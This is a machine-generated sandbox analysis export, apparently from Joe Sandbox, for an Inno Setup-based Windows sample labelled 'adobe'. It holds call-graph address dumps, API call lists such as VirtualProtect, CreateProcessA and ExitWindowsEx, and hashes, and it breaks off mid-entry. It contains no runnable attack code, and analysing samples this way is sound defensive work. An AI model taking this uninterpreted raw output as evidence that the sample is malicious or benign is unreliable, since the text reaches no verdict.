40722f 6322->6324 6325 40322c 4 API calls 6323->6325 6327 40724b 6324->6327 6328 40723f 6324->6328 6326 40722d 6325->6326 6326->6310 6338 4032b8 6327->6338 6331 4071d0 6328->6331 6332 40322c 4 API calls 6331->6332 6333 4071df 6332->6333 6334 4071fc 6333->6334 6335 406950 CharPrevA 6333->6335 6334->6326 6336 4071eb 6335->6336 6336->6334 6337 4032fc 18 API calls 6336->6337 6337->6334 6339 403278 18 API calls 6338->6339 6340 4032c2 6339->6340 6340->6326 6341 402ccc 6344 402cdd 6341->6344 6346 402cfe 6341->6346 6342 402d88 RtlUnwind 6343 403154 4 API calls 6342->6343 6343->6346 6344->6342 6345 402b28 RaiseException 6344->6345 6344->6346 6347 402d7f 6345->6347 6347->6342 6760 403fcd 6761 403f07 4 API calls 6760->6761 6762 403fd6 6761->6762 6763 403e9c 4 API calls 6762->6763 6764 403fe2 6763->6764 6348 4024d0 6349 4024e4 6348->6349 6350 4024e9 6348->6350 6353 401918 4 API calls 6349->6353 6351 402518 6350->6351 6352 40250e RtlEnterCriticalSection 6350->6352 6356 4024ed 6350->6356 6363 402300 6351->6363 6352->6351 6353->6350 6357 401fd4 14 API calls 6360 402531 6357->6360 6358 402581 6359 402577 RtlLeaveCriticalSection 6359->6358 6361 402525 6360->6361 6373 40215c 6360->6373 6361->6358 6361->6359 6364 402314 6363->6364 6365 402335 6364->6365 6367 4023b8 6364->6367 6366 402344 6365->6366 6387 401b74 6365->6387 6366->6357 6366->6361 6367->6366 6371 402455 6367->6371 6390 401d80 6367->6390 6394 401e84 6367->6394 6371->6366 6372 401d00 9 API calls 6371->6372 6372->6366 6374 40217a 6373->6374 6375 402175 6373->6375 6377 4021ab RtlEnterCriticalSection 6374->6377 6380 4021b5 6374->6380 6381 40217e 6374->6381 6376 401918 4 API calls 6375->6376 6376->6374 6377->6380 6378 4021c1 6382 4022e3 RtlLeaveCriticalSection 6378->6382 6383 4022ed 6378->6383 6379 402244 6379->6381 6384 401d80 7 API calls 6379->6384 6380->6378 6380->6379 6385 402270 6380->6385 6381->6361 6382->6383 6383->6361 6384->6381 6385->6378 6386 401d00 7 API calls 6385->6386 6386->6378 6388 40215c 9 API calls 6387->6388 
6389 401b95 6388->6389 6389->6366 6391 401d92 6390->6391 6392 401d89 6390->6392 6391->6367 6392->6391 6393 401b74 9 API calls 6392->6393 6393->6391 6399 401768 6394->6399 6396 401e99 6397 401ea6 6396->6397 6410 401dcc 6396->6410 6397->6367 6401 401787 6399->6401 6400 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6400->6401 6401->6400 6402 40183b 6401->6402 6403 40132c LocalAlloc 6401->6403 6405 401821 6401->6405 6407 4017d6 6401->6407 6409 4017e7 6402->6409 6421 4015c4 6402->6421 6403->6401 6406 40150c VirtualFree 6405->6406 6406->6409 6417 40150c 6407->6417 6409->6396 6411 401d80 9 API calls 6410->6411 6412 401de0 6411->6412 6425 40132c 6412->6425 6414 401df0 6415 401df8 6414->6415 6429 401b44 6414->6429 6415->6397 6420 40153b 6417->6420 6418 401594 6418->6409 6419 401568 VirtualFree 6419->6420 6420->6418 6420->6419 6422 40160a 6421->6422 6423 401626 VirtualAlloc 6422->6423 6424 40163a 6422->6424 6423->6422 6423->6424 6424->6409 6426 401348 6425->6426 6434 4012e4 6426->6434 6430 401b61 6429->6430 6431 401b52 6429->6431 6430->6415 6432 401d00 9 API calls 6431->6432 6433 401b5f 6432->6433 6433->6415 6437 40128c 6434->6437 6438 401298 LocalAlloc 6437->6438 6439 4012aa 6437->6439 6438->6439 6439->6414 6440 4028d2 6441 4028da 6440->6441 6442 403554 4 API calls 6441->6442 6443 4028ef 6441->6443 6442->6441 6444 4025ac 4 API calls 6443->6444 6445 4028f4 6444->6445 6765 4019d3 6766 4019ba 6765->6766 6767 4019c3 RtlLeaveCriticalSection 6766->6767 6768 4019cd 6766->6768 6767->6768 5895 407fd4 5896 407fe6 5895->5896 5898 407fed 5895->5898 5906 407f10 5896->5906 5899 408015 5898->5899 5900 408017 5898->5900 5904 408021 5898->5904 5920 407e2c 5899->5920 5917 407d7c 5900->5917 5901 40804e 5903 407d7c 33 API calls 5903->5901 5904->5901 5904->5903 5907 407f25 5906->5907 5908 407d7c 33 API calls 5907->5908 5909 407f34 5907->5909 5908->5909 5910 407f6e 5909->5910 5911 407d7c 33 API calls 5909->5911 5912 407f82 5910->5912 5913 407d7c 33 API calls 5910->5913 5911->5910 5916 
407fae 5912->5916 5927 407eb8 5912->5927 5913->5912 5916->5898 5930 4058b4 5917->5930 5919 407d9e 5919->5904 5921 405184 33 API calls 5920->5921 5922 407e57 5921->5922 5938 407de4 5922->5938 5924 407e5f 5925 403198 4 API calls 5924->5925 5926 407e74 5925->5926 5926->5904 5928 407ec7 VirtualFree 5927->5928 5929 407ed9 VirtualAlloc 5927->5929 5928->5929 5929->5916 5931 4058c0 5930->5931 5932 405184 33 API calls 5931->5932 5933 4058ed 5932->5933 5934 4031e8 18 API calls 5933->5934 5935 4058f8 5934->5935 5936 403198 4 API calls 5935->5936 5937 40590d 5936->5937 5937->5919 5939 4058b4 33 API calls 5938->5939 5940 407e06 5939->5940 5940->5924 6450 40a0d5 6451 40a105 6450->6451 6452 40a10f CreateWindowExA SetWindowLongA 6451->6452 6453 405184 33 API calls 6452->6453 6454 40a192 6453->6454 6455 4032fc 18 API calls 6454->6455 6456 40a1a0 6455->6456 6457 4032fc 18 API calls 6456->6457 6458 40a1ad 6457->6458 6459 406b7c 19 API calls 6458->6459 6460 40a1b9 6459->6460 6461 4032fc 18 API calls 6460->6461 6462 40a1c2 6461->6462 6463 4099a4 43 API calls 6462->6463 6464 40a1d4 6463->6464 6465 409884 19 API calls 6464->6465 6466 40a1e7 6464->6466 6465->6466 6467 40a220 6466->6467 6468 4094d8 9 API calls 6466->6468 6469 40a239 6467->6469 6472 40a233 RemoveDirectoryA 6467->6472 6468->6467 6470 40a242 73A25CF0 6469->6470 6471 40a24d 6469->6471 6470->6471 6473 40a275 6471->6473 6474 40357c 4 API calls 6471->6474 6472->6469 6475 40a26b 6474->6475 6476 4025ac 4 API calls 6475->6476 6476->6473 5943 40a0e7 5944 40a0eb SetLastError 5943->5944 5975 409648 GetLastError 5944->5975 5947 40a105 5949 40a10f CreateWindowExA SetWindowLongA 5947->5949 5948 402f24 5 API calls 5948->5947 5950 405184 33 API calls 5949->5950 5951 40a192 5950->5951 5952 4032fc 18 API calls 5951->5952 5953 40a1a0 5952->5953 5954 4032fc 18 API calls 5953->5954 5955 40a1ad 5954->5955 5988 406b7c GetCommandLineA 5955->5988 5958 4032fc 18 API calls 5959 40a1c2 5958->5959 5993 4099a4 5959->5993 5962 409884 19 API calls 5963 
40a1e7 5962->5963 5964 40a220 5963->5964 5965 40a207 5963->5965 5967 40a239 5964->5967 5970 40a233 RemoveDirectoryA 5964->5970 6009 4094d8 5965->6009 5968 40a242 73A25CF0 5967->5968 5969 40a24d 5967->5969 5968->5969 5971 40a275 5969->5971 6017 40357c 5969->6017 5970->5967 5973 40a26b 5974 4025ac 4 API calls 5973->5974 5974->5971 5976 404c84 33 API calls 5975->5976 5977 40968f 5976->5977 5978 407284 19 API calls 5977->5978 5979 40969f 5978->5979 5980 408da8 18 API calls 5979->5980 5981 4096b4 5980->5981 5982 405880 18 API calls 5981->5982 5983 4096c3 5982->5983 5984 4031b8 4 API calls 5983->5984 5985 4096e2 5984->5985 5986 403198 4 API calls 5985->5986 5987 4096ea 5986->5987 5987->5947 5987->5948 5989 406af0 18 API calls 5988->5989 5990 406ba1 5989->5990 5991 403198 4 API calls 5990->5991 5992 406bbf 5991->5992 5992->5958 5994 4033b4 18 API calls 5993->5994 5995 4099df 5994->5995 5996 409a11 CreateProcessA 5995->5996 5997 409a24 CloseHandle 5996->5997 5998 409a1d 5996->5998 6000 409a2d 5997->6000 5999 409648 35 API calls 5998->5999 5999->5997 6030 409978 6000->6030 6003 409a49 6004 409978 3 API calls 6003->6004 6005 409a4e GetExitCodeProcess CloseHandle 6004->6005 6006 409a6e 6005->6006 6007 403198 4 API calls 6006->6007 6008 409a76 6007->6008 6008->5962 6008->5963 6010 409532 6009->6010 6014 4094eb 6009->6014 6010->5964 6011 4094f3 Sleep 6011->6014 6012 409503 Sleep 6012->6014 6014->6010 6014->6011 6014->6012 6015 40951a GetLastError 6014->6015 6034 408fbc 6014->6034 6015->6010 6016 409524 GetLastError 6015->6016 6016->6010 6016->6014 6018 403591 6017->6018 6019 4035a0 6017->6019 6022 4035d0 6018->6022 6023 40359b 6018->6023 6027 4035b6 6018->6027 6020 4035b1 6019->6020 6021 4035b8 6019->6021 6024 403198 4 API calls 6020->6024 6025 4031b8 4 API calls 6021->6025 6022->6027 6028 40357c 4 API calls 6022->6028 6023->6019 6026 4035ec 6023->6026 6024->6027 6025->6027 6026->6027 6042 403554 6026->6042 6027->5973 6028->6022 6031 40998c PeekMessageA 6030->6031 6032 409980 
TranslateMessage DispatchMessageA 6031->6032 6033 40999e MsgWaitForMultipleObjects 6031->6033 6032->6031 6033->6000 6033->6003 6035 408f70 2 API calls 6034->6035 6036 408fd2 6035->6036 6037 408fd6 6036->6037 6038 408ff2 DeleteFileA GetLastError 6036->6038 6037->6014 6039 409010 6038->6039 6040 408fac Wow64RevertWow64FsRedirection 6039->6040 6041 409018 6040->6041 6041->6014 6043 403566 6042->6043 6045 403578 6043->6045 6046 403604 6043->6046 6045->6026 6047 40357c 6046->6047 6048 4035a0 6047->6048 6049 4035b6 6047->6049 6052 4035d0 6047->6052 6053 40359b 6047->6053 6050 4035b1 6048->6050 6051 4035b8 6048->6051 6049->6043 6054 403198 4 API calls 6050->6054 6055 4031b8 4 API calls 6051->6055 6052->6049 6056 40357c 4 API calls 6052->6056 6053->6048 6058 4035ec 6053->6058 6054->6049 6055->6049 6056->6052 6057 403554 4 API calls 6057->6058 6058->6049 6058->6057 6772 402be9 RaiseException 6773 402c04 6772->6773 6483 402af2 6484 402afe 6483->6484 6487 402ed0 6484->6487 6488 403154 4 API calls 6487->6488 6490 402ee0 6488->6490 6489 402b03 6490->6489 6492 402b0c 6490->6492 6493 402b25 6492->6493 6494 402b15 RaiseException 6492->6494 6493->6489 6494->6493 6774 402dfa 6775 402e26 6774->6775 6776 402e0d 6774->6776 6778 402ba4 6776->6778 6779 402bc9 6778->6779 6780 402bad 6778->6780 6779->6775 6781 402bb5 RaiseException 6780->6781 6781->6779 6782 4075fa GetFileSize 6783 407626 6782->6783 6784 407616 GetLastError 6782->6784 6784->6783 6785 40761f 6784->6785 6786 40748c 35 API calls 6785->6786 6786->6783 6787 406ffb 6788 407008 SetErrorMode 6787->6788 6499 403a80 CloseHandle 6500 403a90 6499->6500 6501 403a91 GetLastError 6499->6501 6502 40a282 6504 40a1f4 6502->6504 6503 40a220 6506 40a239 6503->6506 6509 40a233 RemoveDirectoryA 6503->6509 6504->6503 6505 4094d8 9 API calls 6504->6505 6505->6503 6507 40a242 73A25CF0 6506->6507 6508 40a24d 6506->6508 6507->6508 6510 40a275 6508->6510 6511 40357c 4 API calls 6508->6511 6509->6506 6512 40a26b 6511->6512 6513 4025ac 4 API calls 
6512->6513 6513->6510 6514 404283 6515 4042c3 6514->6515 6516 403154 4 API calls 6515->6516 6517 404323 6516->6517 6789 404185 6790 4041ff 6789->6790 6791 4041cc 6790->6791 6792 403154 4 API calls 6790->6792 6793 404323 6792->6793 6518 40a287 6519 40a290 6518->6519 6522 40a2bb 6518->6522 6528 409448 6519->6528 6521 40a295 6521->6522 6526 40a2b3 MessageBoxA 6521->6526 6523 403198 4 API calls 6522->6523 6524 40a2f3 6523->6524 6525 403198 4 API calls 6524->6525 6527 40a2fb 6525->6527 6526->6522 6529 409454 GetCurrentProcess OpenProcessToken 6528->6529 6530 4094af ExitWindowsEx 6528->6530 6531 409466 6529->6531 6532 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6529->6532 6530->6531 6531->6521 6532->6530 6532->6531 6533 403e87 6534 403e4c 6533->6534 6535 403e62 6534->6535 6536 403e7b 6534->6536 6540 403e67 6534->6540 6542 403cc8 6535->6542 6537 402674 4 API calls 6536->6537 6539 403e78 6537->6539 6540->6539 6546 402674 6540->6546 6543 403cd6 6542->6543 6544 402674 4 API calls 6543->6544 6545 403ceb 6543->6545 6544->6545 6545->6540 6547 403154 4 API calls 6546->6547 6548 40267a 6547->6548 6548->6539 6553 407e90 6554 407eb8 VirtualFree 6553->6554 6555 407e9d 6554->6555 6802 403991 6803 403983 6802->6803 6804 40374c VariantClear 6803->6804 6805 40398b 6804->6805 6806 405b92 6808 405b94 6806->6808 6807 405bd0 6811 405930 19 API calls 6807->6811 6808->6807 6809 405be7 6808->6809 6810 405bca 6808->6810 6814 404ccc 19 API calls 6809->6814 6810->6807 6812 405c3c 6810->6812 6819 405be3 6811->6819 6813 4059a0 33 API calls 6812->6813 6813->6819 6816 405c10 6814->6816 6815 403198 4 API calls 6818 405c76 6815->6818 6817 4059a0 33 API calls 6816->6817 6817->6819 6819->6815 6558 403e95 6559 403e4c 6558->6559 6560 403e67 6559->6560 6561 403e62 6559->6561 6562 403e7b 6559->6562 6565 403e78 6560->6565 6566 402674 4 API calls 6560->6566 6564 403cc8 4 API calls 6561->6564 6563 402674 4 API calls 6562->6563 6563->6565 6564->6560 6566->6565 6567 403a97 6568 403aac 
6567->6568 6569 403bbc GetStdHandle 6568->6569 6570 403b0e CreateFileA 6568->6570 6579 403ab2 6568->6579 6571 403c17 GetLastError 6569->6571 6584 403bba 6569->6584 6570->6571 6572 403b2c 6570->6572 6571->6579 6574 403b3b GetFileSize 6572->6574 6572->6584 6574->6571 6575 403b4e SetFilePointer 6574->6575 6575->6571 6580 403b6a ReadFile 6575->6580 6576 403be7 GetFileType 6578 403c02 CloseHandle 6576->6578 6576->6579 6578->6579 6580->6571 6581 403b8c 6580->6581 6582 403b9f SetFilePointer 6581->6582 6581->6584 6582->6571 6583 403bb0 SetEndOfFile 6582->6583 6583->6571 6583->6584 6584->6576 6584->6579 6834 408da4 6835 408dc8 6834->6835 6836 408c80 18 API calls 6835->6836 6837 408dd1 6836->6837 6585 402caa 6586 403154 4 API calls 6585->6586 6587 402caf 6586->6587 6838 4011aa 6839 4011ac GetStdHandle 6838->6839 6085 4076ac SetEndOfFile 6086 4076c3 6085->6086 6087 4076bc 6085->6087 6088 40748c 35 API calls 6087->6088 6088->6086 6588 4028ac 6589 402594 18 API calls 6588->6589 6590 4028b6 6589->6590 6591 401ab9 6592 401a96 6591->6592 6593 401aa9 RtlDeleteCriticalSection 6592->6593 6594 401a9f RtlLeaveCriticalSection 6592->6594 6594->6593

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 132 409b30-409b54 GetSystemInfo VirtualQuery 133 409be4-409beb 132->133 134 409b5a 132->134 135 409bd9-409bde 134->135 135->133 136 409b5c-409b63 135->136 137 409bc5-409bd7 VirtualQuery 136->137 138 409b65-409b69 136->138 137->133 137->135 138->137 139 409b6b-409b73 138->139 140 409b84-409b95 VirtualProtect 139->140 141 409b75-409b78 139->141 143 409b97 140->143 144 409b99-409b9b 140->144 141->140 142 409b7a-409b7d 141->142 142->140 145 409b7f-409b82 142->145 143->144 146 409baa-409bad 144->146 145->140 145->144 147 409b9d-409ba6 call 409b28 146->147 148 409baf-409bb1 146->148 147->146 148->137 150 409bb3-409bc0 VirtualProtect 148->150 150->137
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                                                                                          • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                                                                                          • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2441996862-0
                                                                                                                                                          • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                          • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                                                                                          • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                                                                                          • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                          • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                          • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                                                                                          • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                                                                                          • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                          • API String ID: 3256987805-3653653586
                                                                                                                                                          • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                          • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                                                                          • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                          • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02297D18), ref: 0040966C
                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                                                                          • SetWindowLongA.USER32(00020466,000000FC,00409918), ref: 0040A148
                                                                                                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                                                                          • 73A25CF0.USER32(00020466,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                          • API String ID: 3341979996-3001827809
                                                                                                                                                          • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                                                                                          • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                                                                                                          • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                                                                                          • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                          • API String ID: 1646373207-2130885113
                                                                                                                                                          • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                                                                                          • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                                                                                                          • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                                                                                          • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                                                                          • SetWindowLongA.USER32(00020466,000000FC,00409918), ref: 0040A148
                                                                                                                                                            • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                                                                                            • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90,00000000), ref: 00409A28
                                                                                                                                                            • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                                                                            • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90), ref: 00409A5C
                                                                                                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                                                                          • 73A25CF0.USER32(00020466,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                          • API String ID: 978128352-3001827809
                                                                                                                                                          • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                                                                                          • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                                                                                                          • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                                                                                          • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90,00000000), ref: 00409A28
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
